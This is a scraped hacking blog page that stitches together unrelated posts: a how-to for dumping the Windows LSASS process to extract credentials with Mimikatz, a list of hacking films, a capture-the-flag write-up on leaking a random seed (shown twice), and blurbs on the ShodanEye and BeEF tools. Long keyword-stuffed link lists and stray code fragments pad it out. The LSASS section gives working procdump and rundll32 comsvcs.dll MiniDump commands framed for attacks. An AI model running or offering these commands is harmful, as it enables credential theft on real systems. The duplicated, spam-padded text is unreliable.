Wednesday, 15 April 2020

perPage: 7,

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.



















More articles


  1. Hack Tools
  2. Hacking Tools For Games
  3. Pentest Tools Url Fuzzer
  4. Pentest Tools Apk
  5. Tools 4 Hack
  6. Hack Tools Github
  7. Pentest Tools Port Scanner
  8. Hacker Tools Hardware
  9. Hack Tool Apk No Root
  10. Install Pentest Tools Ubuntu
  11. Pentest Tools Url Fuzzer
  12. Hacking Tools For Windows
  13. Hacking Tools For Windows 7
  14. Hack Rom Tools
  15. New Hacker Tools
  16. Hackrf Tools
  17. Growth Hacker Tools
  18. Hack Tools For Games
  19. Pentest Tools Port Scanner
  20. Hack Tools Online
  21. Hacking Tools Usb
  22. Hacker Tools Windows
  23. Hack Tools
  24. Hacking Tools For Windows
  25. Hacking Tools Name
  26. Nsa Hack Tools
perPage: 7,
Technology and hacking gave a new horizon to the science fiction movies. As hacking is getting common and every online thing is at risk whether it's 10% or 90%, not a system is 100% secure over the internet. Every day new security holes are getting discovered. So, now most of the sci-fi movies have the tech and hack stuff to grow awareness in everybody's mind about the online privacy and risk to their information. Here I am sharing top 10 hacking movies that worth a watch.

TOP 10 HACKING MOVIES

Here I have listed top 10 hacking movies that you should watch.

1. HACKERS (1995)

In Hackers, Angelina Jolie and Jonny Lee Miller portray two youthful and hip hackers. Miller portrays a hacker who got caught as a very young child at an age of 11 years after crashing thousands of computers and has been sentenced to zero computer access until his 18th birthday.

2. LIVE FREE OR DIE HARD (2007)

Live Free or Die Hard (also known as Die Hard 4 and released as Die Hard 4.0 outside North America) is a 2007 American action film, and the fourth in the Die Hard film series depicts a scenario where a hacker played by Timothy Olyphant (of Justified fame) takes down nearly the entire U.S. infrastructure in an attempt to transfer trillions of dollars from the Federal Reserve to his account. This movie gives a complete idea of how actually these blackhat hackers operate.

3. EAGLE EYE (2008)

In this movie, two people get a call from an unknown number by a woman. They get a task on the phone that if they don't follow the phone call they would die. This movie displays supercomputer hack on all networks and military networks. This is just an amazing movie on how artificial intelligence computer hacks our real life for bad motives.

4. ALGORITHM (2014)

The film 'Algorithm' tracks the travails of Will, who is the freelance computer hacker who hacks into a top-secret government contractor agency and downloads all their recently developed programs." You can see the full movie below

5. WARGAMES (1983)

The film features David Lightman (Broderick), a young high school student hacker who accidentally hacks into a military supercomputer and starts the countdown to World War III.

6. THE MATRIX (1999)

This is one of the greatest science fiction movies. In this movie, reality, as perceived by most humans, is actually a simulated reality called "the Matrix", created by machines to subdue the human population, while their bodies' heat and electrical activity are used as an energy source.
A character named "Neo", who is a computer Hacker, learns this truth and is drawn into a rebellion against the machines, which involves other people who have been freed from the "dream world". The Matrix franchise is a trilogy movie series.

7. TAKEDOWN (2000)

This movie is based on famous computer U.S. hacker Kevin David Mitnick. Based upon the book and written by his nemesis, Tsutomu Shimomura, the story tends to glorify Shimomura. Mitnick operated in the 1980s and '90s and eventually went to prison for a couple of years. Now, he is a highly paid IT security consultant, speaker, and writer.

8. BLACKHAT (2015)

Blackhat is newly released movie by Chris Hemsworth. In this movie, hackers hack the Chinese nuclear power plant to start a nuclear reaction. Simultaneously, they also hack the stock exchange and steal millions of dollars from the bank. This movie shows how a black hat hackers threaten governments.

9. THE ITALIAN JOB (2003)

Although the MINI Coopers are really the stars of The Italian Job (a remake of the 1969 film of the same name), Seth Green plays Lyle, a hacker among a group of elite thieves, who is able to manipulate traffic signals, among other devices, that make this grand theft possible.

10. UNTRACEABLE (2008)

This film involves a serial killer who rigs contraptions that kill his victims based on the number of hits received by a website KillWithMe.com that features a live streaming video of the victim. Millions of people log on, hastening the victims' deaths.

There may be more exciting hacking movies but I found these top 10 hacking movies that you should watch for once.
You can also find out the top 5 most dangerous hackers in the real world living.

Continue reading


  1. Hacker Tools
  2. Hacking Tools Windows
  3. Hacker Tool Kit
  4. Hacking Tools For Windows
  5. Nsa Hack Tools Download
  6. What Are Hacking Tools
  7. Hack Tools Online
  8. Hack And Tools
  9. Install Pentest Tools Ubuntu
  10. Hack Tools Pc
  11. Bluetooth Hacking Tools Kali
  12. Hack Tools Github
  13. Pentest Tools For Android
  14. Black Hat Hacker Tools
  15. Free Pentest Tools For Windows
  16. Pentest Tools Linux
  17. Pentest Tools For Mac
  18. Hacking Tools Windows 10
  19. Hacker Security Tools
perPage: 7,
perPage: 7,

The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Related news
  1. Best Hacking Tools 2019
  2. Pentest Tools Review
  3. Pentest Tools List
  4. How To Hack
  5. Pentest Tools For Mac
  6. Nsa Hacker Tools
  7. Pentest Tools Open Source
  8. Beginner Hacker Tools
  9. Nsa Hack Tools
  10. Hacker Security Tools
  11. Best Hacking Tools 2019
  12. Hacker Techniques Tools And Incident Handling
  13. Pentest Reporting Tools
  14. How To Hack
  15. Pentest Tools Tcp Port Scanner
  16. Tools Used For Hacking
  17. Pentest Tools Kali Linux
  18. Hacking Tools
  19. Hacker Tools Github
  20. Hacking Tools For Windows 7
perPage: 7,

About ShodanEye
   This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.

   Here you can read the latest article about Shodan Eye: Shodan Eye Ethical Hacking Tool Release

   The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:

   The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.
   For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here

Shodan Eye Ethical Hacking Tool Release
   Before we start the year 2020, today there is a new big release ..! Please note, if you have already installed Shodan Eye on your computer, then it is worthwhile to read it carefully. Of course, even if you don't know this Shodan tool yet:
  • Shodan Eye goes from Python 2 to Python 3
  • Save the output of the Shodan Eye results
  • The entry of the Shodan password is no longer visible.

About Shodan Search Engine
   Shoan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.

   What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Before use this tool, you should note that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal..!

ShodanEye's screenshots:

ShodanEye Installation
   If you're using GNU/Linux, open your terminal and enter these commands:

   If you're a Windows user, follow these steps to install ShodanEye:
  • Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
  • Download shodan-eye-master.zip file.>
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install shodan
    python shodan-eye.py

Video Shodan Eye on YouTube:

Contact to the author:


Related articles


  1. Pentest Tools List
  2. Hacker Hardware Tools
  3. Hacking Tools 2019
  4. Black Hat Hacker Tools
  5. Nsa Hacker Tools
  6. Hacker Hardware Tools
  7. Nsa Hack Tools
  8. Pentest Tools Port Scanner
  9. Hacker Security Tools
  10. Tools Used For Hacking
  11. Wifi Hacker Tools For Windows
  12. Hack Rom Tools
  13. Hack App
  14. Pentest Box Tools Download
  15. Pentest Tools For Windows
  16. Termux Hacking Tools 2019
  17. Pentest Tools Open Source
  18. Underground Hacker Sites
  19. Hacker Tools Mac
  20. Hacker Tools Free
  21. Hacking Tools
  22. Hacking Tools
  23. Hacker Tools
  24. Hacker Tools Github
  25. Growth Hacker Tools
  26. How To Make Hacking Tools
perPage: 7,

The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Related links

Tuesday, 14 April 2020

perPage: 7,


"BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of XSS browser vulnerabilities. Development has focused on creating a modular structure making new module development a trivial process with the intelligence residing within BeEF. Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more." read more...


Website: http://www.bindshell.net/tools/beef


Related links


  1. Ethical Hacker Tools
  2. Hacking Tools For Pc
  3. Pentest Tools Download
  4. Game Hacking
  5. Pentest Tools For Windows
  6. Pentest Tools For Mac
  7. Hacking Tools Software
  8. Free Pentest Tools For Windows
  9. Hack Tools
  10. Hack Website Online Tool
  11. Hack And Tools
  12. Hak5 Tools
  13. Kik Hack Tools
  14. Hack Tools Github
  15. Hacker Hardware Tools
  16. Hacking Tools Online
  17. Hacking Tools
  18. Pentest Tools Linux
  19. Hack Apps
  20. Hacking Tools For Windows
  21. Hacking Tools For Beginners
  22. Hacking Tools And Software

Blog Archive

GET THE LOVE OF YOUR LIFE

Popular Posts

Recent Posts